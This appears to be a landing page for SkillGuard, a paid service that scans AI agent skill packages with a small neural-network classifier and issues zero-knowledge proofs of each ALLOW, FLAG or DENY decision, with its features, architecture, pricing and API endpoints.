SkillGuard: SSL for Agent Skills

Unforgeable cryptographic safety guardrails for OpenClaw agent skills.

zkML Proofs Generated:

▶ How It Works

Before an agent can transact, it installs skills — packages of code that give it new abilities. This is the agent skill supply chain. If a malicious skill enters the supply chain, every downstream action is compromised: stolen credentials, exfiltrated data, unauthorized transactions. SkillGuard is the cryptographic checkpoint at the boundary.

Skill submitted

Developer publishes a skill to ClawHub, or submits data directly via API

→

Features extracted

35 security signals analyzed: shell exec, reverse shells, credential access, obfuscation, entropy, exfiltration, density ratios, interaction terms. Code blocks in SKILL.md are extracted and scanned

→

Classified with proof

Neural network classifies the skill. Jolt Atlas generates a ~53 KB SNARK proof of the computation

→

Anyone verifies

The proof can be independently verified in milliseconds — no trust in SkillGuard required

→

Classification made

ALLOW, FLAG, or DENY. The proof becomes a tamperproof safety certificate for the skill

Like an SSL certificate for agent skills: every classification is backed by a zero-knowledge machine learning proof — a cryptographic receipt that the neural network ran correctly on the claimed inputs. The proof reveals the decision but not the model weights. Anyone can verify. No one can forge.

▶ How the Classifier Works

The classifier is a small neural network that learned to spot dangerous patterns by studying hundreds of examples of safe and malicious skills. It doesn't "understand" code — it counts security-relevant signals and uses learned patterns to decide.

Feature Extraction (35 signals)

Each skill is reduced to 35 numbers: shell exec count, network calls, obfuscation score, reverse shell patterns, credential access, author reputation, download counts, byte entropy, code density ratios, and more. Code blocks inside SKILL.md files are extracted and scanned even when no separate scripts exist. Each value is scaled to 0–128.

Neural Network (4,460 params)

Three layers of neurons (35→56→40→4) mix the features into progressively higher-level patterns. Layer 1 detects basic combinations ("obfuscation + shell exec"). Layer 2 builds compound indicators ("credential stealer" vs "API client"). Layer 3 outputs four scores: SAFE, CAUTION, DANGEROUS, MALICIOUS. Highest wins.

Confidence & Decisions

Raw scores are converted to probabilities via softmax (T=12.8). If the distribution is spread out (high entropy), the model flags it for human review. DANGEROUS/MALICIOUS results need ≥50% confidence for DENY; otherwise they're flagged. SAFE/CAUTION results get ALLOW unless entropy is too high.

Integer Arithmetic & ZK Proofs

All math uses integers (scale=128) instead of floating-point, because the entire forward pass runs inside a zero-knowledge SNARK (Jolt Atlas). This produces a ~53 KB cryptographic proof that the classification was computed correctly. Anyone can verify the proof without trusting SkillGuard or seeing the model weights.

Trained on 690 skill profiles (balanced across 4 classes, including unknown-metadata samples). 93.9% cross-validated accuracy. Adversarially hardened with FGSM perturbations.

Service Status

Checking...

x402 Payment

Price per provable classification

$0.001 USDC

Includes

zkML proof

Network

Base (eip155:8453)

Protocol

HTTP 402 / x402

Try It

🔍

Loading skill directory...

GitHub URL detected

ZKML Proving

Proving Scheme

Jolt / Dory

Model Size

4,460 params (35-56-40-4)

Proofs Generated

Proofs Verified

Endpoints

Method	Path	Auth	Price
POST	`/api/v1/evaluate`	API key or x402	$0.001
POST	`/api/v1/verify`	None	Free
GET	`/health`	None	Free
GET	`/stats`	None	Free
GET	`/openapi.json`	None	Free
GET	`/.well-known/ai-plugin.json`	None	Free
GET	`/.well-known/llms.txt`	None	Free

Live Statistics

Total Requests

Errors

Evaluate

By Name

Prove

Verify

Classifications

Safe

Caution

Dangerous

Malicious

Decisions

Allow

Deny

Flag